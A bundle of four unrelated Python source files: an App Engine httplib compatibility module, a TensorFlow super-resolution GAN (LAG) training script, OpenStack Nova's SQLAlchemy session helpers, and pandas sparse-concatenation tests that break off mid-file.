"Provide a getfile, since the superclass' does not use this concept."
return self.file
def putheader(self, header, *values):
"The superclass allows only one value argument."
self._conn.putheader(header, '\r\n\t'.join([str(v) for v in values]))
def getreply(self, buffering=False):
"""Compat definition since superclass does not define it.
Returns a tuple consisting of:
- server status code (e.g. '200' if all goes well)
- server "reason" corresponding to status code
- any RFC822 headers in the response from the server
"""
response = self._conn.getresponse()
self.headers = response.msg
self.file = response.fp
return response.status, response.reason, response.msg
def close(self):
self._conn.close()
# note that self.file == response.fp, which gets closed by the
# superclass. just clear the object ref here.
### hmm. messy. if status==-1, then self.file is owned by us.
### well... we aren't explicitly closing, but losing this ref will
### do it
self.file = None
# Copy from Python's httplib implementation.
class HTTPS(HTTP):
"""Compatibility with 1.5 httplib interface
Python 1.5.2 did not have an HTTPS class, but it defined an
interface for sending http requests that is also useful for
https.
"""
# App Engine Note: The public interface is identical to the interface provided
# in Python 2.7 except that key and certificate files are not supported.
_connection_class = HTTPSConnection
def __init__(self, host='', port=None, key_file=None, cert_file=None,
strict=None):
if key_file is not None or cert_file is not None:
raise NotImplementedError(
'key_file and cert_file arguments are not implemented')
# provide a default host, pass the X509 cert info
# urf. compensate for bad input.
if port == 0:
port = None
self._setup(self._connection_class(host, port, key_file,
cert_file, strict))
# we never actually use these for anything, but we keep them
# here for compatibility with post-1.5.2 CVS.
self.key_file = key_file
self.cert_file = cert_file
class HTTPException(Exception):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
# Subclasses that define an __init__ must call Exception.__init__
# or define self.args. Otherwise, str() will fail.
pass
class NotConnected(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class InvalidURL(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class UnknownProtocol(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
def __init__(self, version):
self.args = version,
self.version = version
class UnknownTransferEncoding(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class UnimplementedFileMode(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class IncompleteRead(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
def __init__(self, partial, expected=None):
self.args = partial,
self.partial = partial
self.expected = expected
def __repr__(self):
if self.expected is not None:
e = ', %i more expected' % self.expected
else:
e = ''
return 'IncompleteRead(%i bytes read%s)' % (len(self.partial), e)
def __str__(self):
return repr(self)
class ImproperConnectionState(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class CannotSendRequest(ImproperConnectionState):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class CannotSendHeader(ImproperConnectionState):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class ResponseNotReady(ImproperConnectionState):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class BadStatusLine(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
def __init__(self, line):
if not line:
line = repr(line)
self.args = line,
self.line = line
class LineTooLong(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
def __init__(self, line_type):
HTTPException.__init__(self, "got more than %d bytes when reading %s"
% (_MAXLINE, line_type))
# for backwards compatibility
error = HTTPException
class LineAndFileWrapper:
"""A limited file-like object for HTTP/0.9 responses."""
# App Engine Note: This class has been copied unchanged from Python 2.7.2
# The status-line parsing code calls readline(), which normally
# get the HTTP status line. For a 0.9 response, however, this is
# actually the first line of the body! Clients need to get a
# readable file object that contains that line.
def __init__(self, line, file):
self._line = line
self._file = file
self._line_consumed = 0
self._line_offset = 0
self._line_left = len(line)
def __getattr__(self, attr):
return getattr(self._file, attr)
def _done(self):
# called when the last byte is read from the line. After the
# call, all read methods are delegated to the underlying file
# object.
self._line_consumed = 1
self.read = self._file.read
self.readline = self._file.readline
self.readlines = self._file.readlines
def read(self, amt=None):
if self._line_consumed:
return self._file.read(amt)
assert self._line_left
if amt is None or amt > self._line_left:
s = self._line[self._line_offset:]
self._done()
if amt is None:
return s + self._file.read()
else:
return s + self._file.read(amt - len(s))
else:
assert amt <= self._line_left
i = self._line_offset
j = i + amt
s = self._line[i:j]
self._line_offset = j
self._line_left -= amt
if self._line_left == 0:
self._done()
return s
def readline(self):
if self._line_consumed:
return self._file.readline()
assert self._line_left
s = self._line[self._line_offset:]
self._done()
return s
def readlines(self, size=None):
if self._line_consumed:
return self._file.readlines(size)
assert self._line_left
L = [self._line[self._line_offset:]]
self._done()
if size is None:
return L + self._file.readlines()
else:
return L + self._file.readlines(size)
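# A minimal usage sketch (not part of the original module). It assumes an App
# Engine runtime where google.appengine.api.urlfetch is importable, since that
# is what HTTPConnection.getresponse() ultimately delegates to; the host and
# path below are placeholders.
def _example_fetch(host='example.com', path='/'):
    conn = HTTPConnection(host)
    conn.request('GET', path, headers={'Accept': 'text/html'})
    response = conn.getresponse()   # performs the urlfetch call
    body = response.read()          # whole body is buffered in memory
    conn.close()
    return response.status, body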
|
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Latent-Adversarial Generator.
"""
import functools
import os
import numpy as np
import tensorflow as tf
from absl import app
from absl import flags
from easydict import EasyDict
from libml import data, layers, utils
from libml.layers import conv2d_scaled
from libml.train import TrainSchedule
from libml.train_sr import SRESPro
FLAGS = flags.FLAGS
class LAG(SRESPro):
def stage_scopes(self, stage):
return (['global_step']
+ ['opt_%d/' % x for x in range(stage + 1)]
+ ['sres/stage_%d/' % x for x in range(stage + 1)]
+ ['disc/stage_%d/' % x for x in range(stage + 1)])
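# e.g. stage_scopes(1) -> ['global_step', 'opt_0/', 'opt_1/',
#                          'sres/stage_0/', 'sres/stage_1/',
#                          'disc/stage_0/', 'disc/stage_1/']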
def sres(self, x0, colors, lod, lod_min, lod_start, lod_stop, blocks, lfilters, ema=None):
getter = functools.partial(utils.getter_ema, ema) if ema else None
scope_args = dict(custom_getter=getter, reuse=tf.AUTO_REUSE)
lrelu_args = dict(activation=tf.nn.leaky_relu)
relu_args = dict(activation=tf.nn.relu)
with tf.variable_scope('sres', **scope_args):
with tf.variable_scope('stage_0', **scope_args):
y = conv2d_scaled(x0, lfilters[0], 3)
for x in range(blocks):
dy = conv2d_scaled(y, lfilters[0], 3, **relu_args)
y += conv2d_scaled(dy, lfilters[0], 3) / blocks
rgb = []
for stage in range(lod_min, lod_stop + 1):
with tf.variable_scope('stage_%d' % stage, **scope_args):
y = layers.upscale2d(y)
y = conv2d_scaled(y, lfilters[stage], 3, **lrelu_args)
y = conv2d_scaled(y, lfilters[stage], 3, **lrelu_args)
with tf.variable_scope('to_rgb', **scope_args):
rgb.append(conv2d_scaled(y, colors, 3))
im = rgb.pop(0)
for stage in range(lod_min + 1, lod_start + 1):
im = layers.upscale2d(im) + rgb.pop(0)
if lod_start == lod_stop:
return im
return layers.upscale2d(im) + (lod - lod_start) * rgb[-1]
def disc(self, x0, x0_lores_delta, lod, lod_min, lod_start, lod_stop, blocks, lfilters):
leaky_relu = dict(activation=tf.nn.leaky_relu)
def from_rgb(x, stage):
with tf.variable_scope('from_rgb', reuse=tf.AUTO_REUSE):
return conv2d_scaled(x, lfilters[stage], 3, **leaky_relu)
with tf.variable_scope('disc', reuse=tf.AUTO_REUSE):
y = None
for stage in range(lod_stop, lod_min - 1, -1):
with tf.variable_scope('stage_%d' % stage, reuse=tf.AUTO_REUSE):
if stage == lod_stop:
y = from_rgb(x0, stage)
elif stage == lod_start:
y0 = from_rgb(layers.downscale2d(x0), stage)
y = y0 + (lod - lod_start) * y
else:
y += from_rgb(layers.downscale2d(x0, 1 << (lod_stop - stage)), stage)
y = conv2d_scaled(y, lfilters[stage], 3, **leaky_relu)
y = layers.space_to_channels(y)
y = conv2d_scaled(y, lfilters[stage - 1], 3, **leaky_relu)
y = tf.concat([y, x0_lores_delta], axis=1)
with tf.variable_scope('stage_0', reuse=tf.AUTO_REUSE):
for x in range(blocks):
y = conv2d_scaled(y, lfilters[0], 3, **leaky_relu)
center = np.ones(lfilters[0], 'f')
center[::2] = -1
center = tf.constant(center, shape=[1, lfilters[0], 1, 1])
return y * center
def model(self, dataset, lod_min, lod_max, lod_start, lod_stop, scale, blocks, filters, filters_min,
wass_target, weight_avg, mse_weight, noise_dim, ttur, total_steps, **kwargs):
assert lod_min == 1
del kwargs
x = tf.placeholder(tf.float32, [None, dataset.colors, dataset.height, dataset.width], 'x')
y = tf.placeholder(tf.float32, [None, dataset.colors, None, None], 'y')
noise = tf.placeholder(tf.float32, [], 'noise')
lod = tf.placeholder(tf.float32, [], 'lod')
lfilters = [max(filters_min, filters >> stage) for stage in range(lod_max + 1)]
disc = functools.partial(self.disc, lod=lod, lod_min=lod_min, lod_start=lod_start, lod_stop=lod_stop,
blocks=blocks, lfilters=lfilters)
sres = functools.partial(self.sres, lod=lod, lod_min=lod_min, lod_start=lod_start, lod_stop=lod_stop,
blocks=blocks, lfilters=lfilters, colors=dataset.colors)
ema = tf.train.ExponentialMovingAverage(decay=weight_avg) if weight_avg > 0 else None
def pad_shape(x):
return [tf.shape(x)[0], noise_dim, tf.shape(x)[2], tf.shape(x)[3]]
def straight_through_round(x, r=127.5 / 4):
xr = tf.round(x * r) / r
return tf.stop_gradient(xr - x) + x
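        # Straight-through estimator: the forward value is the quantized xr, while
        # tf.stop_gradient(xr - x) + x keeps an identity gradient with respect to x.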
def sres_op(y, noise):
eps = tf.random_normal(pad_shape(y), stddev=noise)
sres_op = sres(tf.concat([y, eps], axis=1), ema=ema)
sres_op = layers.upscale2d(sres_op, 1 << (lod_max - lod_stop))
return sres_op
def tower(x):
lores = self.downscale(x)
real = layers.downscale2d(x, 1 << (lod_max - lod_stop))
if lod_start != lod_stop:
real = layers.blend_resolution(layers.remove_details2d(real), real, lod - lod_start)
eps = tf.random_normal(pad_shape(lores))
fake = sres(tf.concat([lores, tf.zeros_like(eps)], axis=1))
fake_eps = sres(tf.concat([lores, eps], axis=1))
lores_fake = self.downscale(layers.upscale2d(fake, 1 << (lod_max - lod_stop)))
lores_fake_eps = self.downscale(layers.upscale2d(fake_eps, 1 << (lod_max - lod_stop)))
latent_real = disc(real, straight_through_round(tf.abs(lores - lores)))
latent_fake = disc(fake, straight_through_round(tf.abs(lores - lores_fake)))
latent_fake_eps = disc(fake_eps, straight_through_round(tf.abs(lores - lores_fake_eps)))
# Gradient penalty.
mix = tf.random_uniform([tf.shape(real)[0], 1, 1, 1], 0., 1.)
mixed = real + mix * (fake_eps - real)
mixed = layers.upscale2d(mixed, 1 << (lod_max - lod_stop))
mixed_round = straight_through_round(tf.abs(lores - self.downscale(mixed)))
mixdown = layers.downscale2d(mixed, 1 << (lod_max - lod_stop))
grad = tf.gradients(tf.reduce_sum(tf.reduce_mean(disc(mixdown, mixed_round), 1)), [mixed])[0]
grad_norm = tf.sqrt(tf.reduce_mean(tf.square(grad), axis=[1, 2, 3]) + 1e-8)
loss_dreal = -tf.reduce_mean(latent_real)
loss_dfake = tf.reduce_mean(latent_fake_eps)
loss_gfake = -tf.reduce_mean(latent_fake_eps)
loss_gmse = tf.losses.mean_squared_error(latent_real, latent_fake)
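            # WGAN-GP style penalty (loss_gp below): drives the critic's gradient
            # norm at the interpolated samples towards wass_target; the
            # wass_target ** -2 factor keeps its strength independent of the target scale.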
loss_gp = 10 * tf.reduce_mean(tf.square(grad_norm - wass_target)) * wass_target ** -2
mse_ema = tf.losses.mean_squared_error(sres(tf.concat([lores, tf.zeros_like(eps)], axis=1), ema=ema), real)
return loss_gmse, loss_gfake, loss_dreal, loss_dfake, loss_gp, mse_ema
loss_gmse, loss_gfake, loss_dreal, loss_dfake, loss_gp, mse_ema = utils.para_mean(tower, x)
loss_disc = loss_dreal + loss_dfake + loss_gp
loss_gen = loss_gfake + mse_weight * loss_gmse
utils.HookReport.log_tensor(loss_dreal, 'dreal')
utils.HookReport.log_tensor(loss_dfake, 'dfake')
utils.HookReport.log_tensor(loss_gp, 'gp')
utils.HookReport.log_tensor(loss_gfake, 'gfake')
utils.HookReport.log_tensor(loss_gmse, 'gmse')
utils.HookReport.log_tensor(tf.sqrt(mse_ema) * 127.5, 'rmse_ema')
utils.HookReport.log_tensor(lod, 'lod')
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_d, train_g = [], []
global_arg = dict(global_step=tf.train.get_global_step())
for stage in range(lod_stop + 1):
g_arg = global_arg if stage == 0 else {}
with tf.variable_scope('opt_%d' % stage):
train_d.append(tf.train.AdamOptimizer(FLAGS.lr, 0, 0.99).minimize(
loss_disc * ttur, var_list=utils.model_vars('disc/stage_%d' % stage),
colocate_gradients_with_ops=True))
train_g.append(tf.train.AdamOptimizer(FLAGS.lr, 0, 0.99).minimize(
loss_gen, var_list=utils.model_vars('sres/stage_%d' % stage),
colocate_gradients_with_ops=True, **g_arg))
if ema is not None:
ema_op = ema.apply(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'sres'))
train_op = tf.group(*train_d, *train_g, ema_op)
else:
train_op = tf.group(*train_d, *train_g)
return EasyDict(x=x, y=y, noise=noise, lod=lod, train_op=train_op,
downscale_op=self.downscale(x),
upscale_op=layers.upscale2d(y, self.scale, order=layers.NCHW),
sres_op=sres_op(y, noise),
eval_op=sres_op(self.downscale(x), 0))
def main(argv):
del argv # Unused.
dataset = data.get_dataset(FLAGS.dataset)
schedule = TrainSchedule(2, FLAGS.scale, FLAGS.transition_kimg, FLAGS.training_kimg, FLAGS.total_kimg)
if FLAGS.memtest:
schedule.schedule = schedule.schedule[-2:]
model = LAG(
os.path.join(FLAGS.train_dir, dataset.name),
lr=FLAGS.lr,
batch=FLAGS.batch,
lod_min=1,
scale=FLAGS.scale,
downscaler=FLAGS.downscaler,
blocks=FLAGS.blocks,
filters=FLAGS.filters,
filters_min=FLAGS.filters_min,
mse_weight=FLAGS.mse_weight,
noise_dim=FLAGS.noise_dim,
transition_kimg=FLAGS.transition_kimg,
training_kimg=FLAGS.training_kimg,
ttur=FLAGS.ttur,
wass_target=FLAGS.wass_target,
weight_avg=FLAGS.weight_avg)
if FLAGS.reset:
model.reset_files()
model.train(dataset, schedule)
if __name__ == '__main__':
utils.setup_tf()
flags.DEFINE_integer('blocks', 8, 'Number of residual layers in residual networks.')
flags.DEFINE_integer('filters', 256, 'Filter size of first convolution.')
flags.DEFINE_integer('filters_min', 64, 'Minimum filter size of convolution.')
flags.DEFINE_integer('noise_dim', 64, 'Number of noise dimensions to concat to lores.')
flags.DEFINE_integer('transition_kimg', 2048, 'Number of images during transition (in kimg).')
    flags.DEFINE_integer('training_kimg', 2048, 'Number of training images between transitions (in kimg).')
flags.DEFINE_integer('ttur', 4, 'How much faster D is trained.')
flags.DEFINE_float('wass_target', 1, 'Wasserstein gradient penalty target value.')
flags.DEFINE_float('weight_avg', 0.999, 'Weight averaging.')
flags.DEFINE_float('mse_weight', 10, 'Amount of mean square error loss for G.')
flags.DEFINE_bool('reset', False, 'Retrain from the start.')
flags.DEFINE_bool('memtest', False, 'Test if the parameters fit in memory (start at last stage).')
FLAGS.set_default('batch', 16)
FLAGS.set_default('lr', 0.001)
FLAGS.set_default('total_kimg', 0)
app.run(main)
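# Illustrative invocation (a sketch, not taken from this file: the script name
# and flag values are placeholders, and --dataset/--scale/--batch are defined
# elsewhere in the imported libml modules):
#   python lag.py --dataset=<dataset_name> --scale=4 --batch=16 --filters=256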
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Session Handling for SQLAlchemy backend."""
import re
import time
from sqlalchemy.exc import DisconnectionError, OperationalError
import sqlalchemy.interfaces
import sqlalchemy.orm
from sqlalchemy.pool import NullPool, StaticPool
import nova.exception
import nova.flags as flags
import nova.openstack.common.log as logging
FLAGS = flags.FLAGS
LOG = logging.getLogger(__name__)
_ENGINE = None
_MAKER = None
def get_session(autocommit=True, expire_on_commit=False):
"""Return a SQLAlchemy session."""
global _MAKER
if _MAKER is None:
engine = get_engine()
_MAKER = get_maker(engine, autocommit, expire_on_commit)
session = _MAKER()
session.query = nova.exception.wrap_db_error(session.query)
session.flush = nova.exception.wrap_db_error(session.flush)
return session
def synchronous_switch_listener(dbapi_conn, connection_rec):
"""Switch sqlite connections to non-synchronous mode"""
dbapi_conn.execute("PRAGMA synchronous = OFF")
def add_regexp_listener(dbapi_con, con_record):
"""Add REGEXP function to sqlite connections."""
def regexp(expr, item):
reg = re.compile(expr)
return reg.search(unicode(item)) is not None
dbapi_con.create_function('regexp', 2, regexp)
def ping_listener(dbapi_conn, connection_rec, connection_proxy):
"""
Ensures that MySQL connections checked out of the
pool are alive.
Borrowed from:
http://groups.google.com/group/sqlalchemy/msg/a4ce563d802c929f
"""
try:
dbapi_conn.cursor().execute('select 1')
except dbapi_conn.OperationalError, ex:
if ex.args[0] in (2006, 2013, 2014, 2045, 2055):
LOG.warn('Got mysql server has gone away: %s', ex)
raise DisconnectionError("Database server went away")
else:
raise
def is_db_connection_error(args):
"""Return True if error in connecting to db."""
# NOTE(adam_g): This is currently MySQL specific and needs to be extended
# to support Postgres and others.
conn_err_codes = ('2002', '2003', '2006')
for err_code in conn_err_codes:
if args.find(err_code) != -1:
return True
return False
def get_engine():
"""Return a SQLAlchemy engine."""
global _ENGINE
if _ENGINE is None:
connection_dict = sqlalchemy.engine.url.make_url(FLAGS.sql_connection)
engine_args = {
"pool_recycle": FLAGS.sql_idle_timeout,
"echo": False,
'convert_unicode': True,
}
# Map our SQL debug level to SQLAlchemy's options
if FLAGS.sql_connection_debug >= 100:
engine_args['echo'] = 'debug'
elif FLAGS.sql_connection_debug >= 50:
engine_args['echo'] = True
if "sqlite" in connection_dict.drivername:
engine_args["poolclass"] = NullPool
if FLAGS.sql_connection == "sqlite://":
engine_args["poolclass"] = StaticPool
engine_args["connect_args"] = {'check_same_thread': False}
_ENGINE = sqlalchemy.create_engine(FLAGS.sql_connection, **engine_args)
if 'mysql' in connection_dict.drivername:
sqlalchemy.event.listen(_ENGINE, 'checkout', ping_listener)
elif "sqlite" in connection_dict.drivername:
if not FLAGS.sqlite_synchronous:
sqlalchemy.event.listen(_ENGINE, 'connect',
synchronous_switch_listener)
sqlalchemy.event.listen(_ENGINE, 'connect', add_regexp_listener)
if (FLAGS.sql_connection_trace and
_ENGINE.dialect.dbapi.__name__ == 'MySQLdb'):
import MySQLdb.cursors
_do_query = debug_mysql_do_query()
setattr(MySQLdb.cursors.BaseCursor, '_do_query', _do_query)
try:
_ENGINE.connect()
except OperationalError, e:
if not is_db_connection_error(e.args[0]):
raise
remaining = FLAGS.sql_max_retries
if remaining == -1:
remaining = 'infinite'
while True:
msg = _('SQL connection failed. %s attempts left.')
LOG.warn(msg % remaining)
if remaining != 'infinite':
remaining -= 1
time.sleep(FLAGS.sql_retry_interval)
try:
_ENGINE.connect()
break
except OperationalError, e:
if (remaining != 'infinite' and remaining == 0) or \
not is_db_connection_error(e.args[0]):
raise
return _ENGINE
def get_maker(engine, autocommit=True, expire_on_commit=False):
"""Return a SQLAlchemy sessionmaker using the given engine."""
return sqlalchemy.orm.sessionmaker(bind=engine,
autocommit=autocommit,
expire_on_commit=expire_on_commit)
def debug_mysql_do_query():
"""Return a debug version of MySQLdb.cursors._do_query"""
import MySQLdb.cursors
import traceback
old_mysql_do_query = MySQLdb.cursors.BaseCursor._do_query
def _do_query(self, q):
stack = ''
for file, line, method, function in traceback.extract_stack():
# exclude various common things from trace
if file.endswith('session.py') and method == '_do_query':
continue
if file.endswith('api.py') and method == 'wrapper':
continue
if file.endswith('utils.py') and method == '_inner':
continue
if file.endswith('exception.py') and method == '_wrap':
continue
# nova/db/api is just a wrapper around nova/db/sqlalchemy/api
if file.endswith('nova/db/api.py'):
continue
# only trace inside nova
index = file.rfind('nova')
if index == -1:
continue
stack += "File:%s:%s Method:%s() Line:%s | " \
% (file[index:], line, method, function)
# strip trailing " | " from stack
if stack:
stack = stack[:-3]
qq = "%s /* %s */" % (q, stack)
else:
qq = q
old_mysql_do_query(self, qq)
# return the new _do_query method
return _do_query
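# Illustrative usage sketch (not part of the original module; SomeModel is a
# hypothetical mapped class and FLAGS.sql_connection is assumed to point at a
# configured database):
#
#     session = get_session()
#     rows = session.query(SomeModel).all()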
|
|
# pylint: disable-msg=E1101,W0612
import itertools
import numpy as np
import pytest
from pandas.errors import PerformanceWarning
import pandas as pd
import pandas.util.testing as tm
class TestSparseArrayConcat(object):
@pytest.mark.parametrize('kind', ['integer', 'block'])
def test_basic(self, kind):
a = pd.SparseArray([1, 0, 0, 2], kind=kind)
b = pd.SparseArray([1, 0, 2, 2], kind=kind)
result = pd.SparseArray._concat_same_type([a, b])
        # Can't make any assertions about the sparse index itself
        # since we don't merge sparse blocks across arrays
        # in to_concat
expected = np.array([1, 2, 1, 2, 2], dtype='int64')
tm.assert_numpy_array_equal(result.sp_values, expected)
assert result.kind == kind
@pytest.mark.parametrize('kind', ['integer', 'block'])
def test_uses_first_kind(self, kind):
other = 'integer' if kind == 'block' else 'block'
a = pd.SparseArray([1, 0, 0, 2], kind=kind)
b = pd.SparseArray([1, 0, 2, 2], kind=other)
result = pd.SparseArray._concat_same_type([a, b])
expected = np.array([1, 2, 1, 2, 2], dtype='int64')
tm.assert_numpy_array_equal(result.sp_values, expected)
assert result.kind == kind
class TestSparseSeriesConcat(object):
@pytest.mark.parametrize('kind', [
'integer',
'block',
])
def test_concat(self, kind):
val1 = np.array([1, 2, np.nan, np.nan, 0, np.nan])
val2 = np.array([3, np.nan, 4, 0, 0])
sparse1 = pd.SparseSeries(val1, name='x', kind=kind)
sparse2 = pd.SparseSeries(val2, name='y', kind=kind)
res = pd.concat([sparse1, sparse2])
exp = pd.concat([pd.Series(val1), pd.Series(val2)])
exp = pd.SparseSeries(exp, kind=kind)
tm.assert_sp_series_equal(res, exp, consolidate_block_indices=True)
sparse1 = pd.SparseSeries(val1, fill_value=0, name='x', kind=kind)
sparse2 = pd.SparseSeries(val2, fill_value=0, name='y', kind=kind)
res = pd.concat([sparse1, sparse2])
exp = pd.concat([pd.Series(val1), pd.Series(val2)])
exp = pd.SparseSeries(exp, fill_value=0, kind=kind)
tm.assert_sp_series_equal(res, exp, consolidate_block_indices=True)
def test_concat_axis1(self):
val1 = np.array([1, 2, np.nan, np.nan, 0, np.nan])
val2 = np.array([3, np.nan, 4, 0, 0])
sparse1 = pd.SparseSeries(val1, name='x')
sparse2 = pd.SparseSeries(val2, name='y')
res = pd.concat([sparse1, sparse2], axis=1)
exp = pd.concat([pd.Series(val1, name='x'),
pd.Series(val2, name='y')], axis=1)
exp = pd.SparseDataFrame(exp)
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
def test_concat_different_fill(self):
val1 = np.array([1, 2, np.nan, np.nan, 0, np.nan])
val2 = np.array([3, np.nan, 4, 0, 0])
for kind in ['integer', 'block']:
sparse1 = pd.SparseSeries(val1, name='x', kind=kind)
sparse2 = pd.SparseSeries(val2, name='y', kind=kind, fill_value=0)
with tm.assert_produces_warning(PerformanceWarning):
res = pd.concat([sparse1, sparse2])
exp = pd.concat([pd.Series(val1), pd.Series(val2)])
exp = pd.SparseSeries(exp, kind=kind)
tm.assert_sp_series_equal(res, exp)
with tm.assert_produces_warning(PerformanceWarning):
res = pd.concat([sparse2, sparse1])
exp = pd.concat([pd.Series(val2), pd.Series(val1)])
exp = pd.SparseSeries(exp, kind=kind, fill_value=0)
tm.assert_sp_series_equal(res, exp)
def test_concat_axis1_different_fill(self):
val1 = np.array([1, 2, np.nan, np.nan, 0, np.nan])
val2 = np.array([3, np.nan, 4, 0, 0])
sparse1 = pd.SparseSeries(val1, name='x')
sparse2 = pd.SparseSeries(val2, name='y', fill_value=0)
res = pd.concat([sparse1, sparse2], axis=1)
exp = pd.concat([pd.Series(val1, name='x'),
pd.Series(val2, name='y')], axis=1)
assert isinstance(res, pd.SparseDataFrame)
tm.assert_frame_equal(res.to_dense(), exp)
def test_concat_different_kind(self):
val1 = np.array([1, 2, np.nan, np.nan, 0, np.nan])
val2 = np.array([3, np.nan, 4, 0, 0])
sparse1 = pd.SparseSeries(val1, name='x', kind='integer')
sparse2 = pd.SparseSeries(val2, name='y', kind='block')
res = pd.concat([sparse1, sparse2])
exp = pd.concat([pd.Series(val1), pd.Series(val2)])
exp = pd.SparseSeries(exp, kind=sparse1.kind)
tm.assert_sp_series_equal(res, exp)
res = pd.concat([sparse2, sparse1])
exp = pd.concat([pd.Series(val2), pd.Series(val1)])
exp = pd.SparseSeries(exp, kind=sparse2.kind)
tm.assert_sp_series_equal(res, exp, consolidate_block_indices=True)
@pytest.mark.parametrize('kind', [
'integer',
'block',
])
def test_concat_sparse_dense(self, kind):
# use first input's fill_value
val1 = np.array([1, 2, np.nan, np.nan, 0, np.nan])
val2 = np.array([3, np.nan, 4, 0, 0])
sparse = pd.SparseSeries(val1, name='x', kind=kind)
dense = pd.Series(val2, name='y')
res = pd.concat([sparse, dense])
exp = pd.SparseSeries(pd.concat([pd.Series(val1), dense]), kind=kind)
tm.assert_sp_series_equal(res, exp)
res = pd.concat([dense, sparse, dense])
exp = pd.concat([dense, pd.Series(val1), dense])
# XXX: changed from SparseSeries to Series[sparse]
exp = pd.Series(
pd.SparseArray(exp, kind=kind),
index=exp.index,
name=exp.name,
)
tm.assert_series_equal(res, exp)
sparse = pd.SparseSeries(val1, name='x', kind=kind, fill_value=0)
dense = pd.Series(val2, name='y')
res = pd.concat([sparse, dense])
# XXX: changed from SparseSeries to Series[sparse]
exp = pd.concat([pd.Series(val1), dense])
exp = pd.Series(
pd.SparseArray(exp, kind=kind, fill_value=0),
index=exp.index,
name=exp.name,
)
tm.assert_series_equal(res, exp)
res = pd.concat([dense, sparse, dense])
exp = pd.concat([dense, pd.Series(val1), dense])
# XXX: changed from SparseSeries to Series[sparse]
exp = pd.Series(
pd.SparseArray(exp, kind=kind, fill_value=0),
index=exp.index,
name=exp.name,
)
tm.assert_series_equal(res, exp)
class TestSparseDataFrameConcat(object):
def setup_method(self, method):
self.dense1 = pd.DataFrame({'A': [0., 1., 2., np.nan],
'B': [0., 0., 0., 0.],
'C': [np.nan, np.nan, np.nan, np.nan],
'D': [1., 2., 3., 4.]})
self.dense2 = pd.DataFrame({'A': [5., 6., 7., 8.],
'B': [np.nan, 0., 7., 8.],
'C': [5., 6., np.nan, np.nan],
'D': [np.nan, np.nan, np.nan, np.nan]})
self.dense3 = pd.DataFrame({'E': [5., 6., 7., 8.],
'F': [np.nan, 0., 7., 8.],
'G': [5., 6., np.nan, np.nan],
'H': [np.nan, np.nan, np.nan, np.nan]})
def test_concat(self):
# fill_value = np.nan
sparse = self.dense1.to_sparse()
sparse2 = self.dense2.to_sparse()
res = pd.concat([sparse, sparse])
exp = pd.concat([self.dense1, self.dense1]).to_sparse()
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
res = pd.concat([sparse2, sparse2])
exp = pd.concat([self.dense2, self.dense2]).to_sparse()
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
res = pd.concat([sparse, sparse2])
exp = pd.concat([self.dense1, self.dense2]).to_sparse()
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
res = pd.concat([sparse2, sparse])
exp = pd.concat([self.dense2, self.dense1]).to_sparse()
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
# fill_value = 0
sparse = self.dense1.to_sparse(fill_value=0)
sparse2 = self.dense2.to_sparse(fill_value=0)
res = pd.concat([sparse, sparse])
exp = pd.concat([self.dense1, self.dense1]).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
res = pd.concat([sparse2, sparse2])
exp = pd.concat([self.dense2, self.dense2]).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
res = pd.concat([sparse, sparse2])
exp = pd.concat([self.dense1, self.dense2]).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
res = pd.concat([sparse2, sparse])
exp = pd.concat([self.dense2, self.dense1]).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
def test_concat_different_fill_value(self):
# 1st fill_value will be used
sparse = self.dense1.to_sparse()
sparse2 = self.dense2.to_sparse(fill_value=0)
with tm.assert_produces_warning(PerformanceWarning):
res = pd.concat([sparse, sparse2])
exp = pd.concat([self.dense1, self.dense2]).to_sparse()
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
with tm.assert_produces_warning(PerformanceWarning):
res = pd.concat([sparse2, sparse])
exp = pd.concat([self.dense2, self.dense1]).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
def test_concat_different_columns_sort_warns(self):
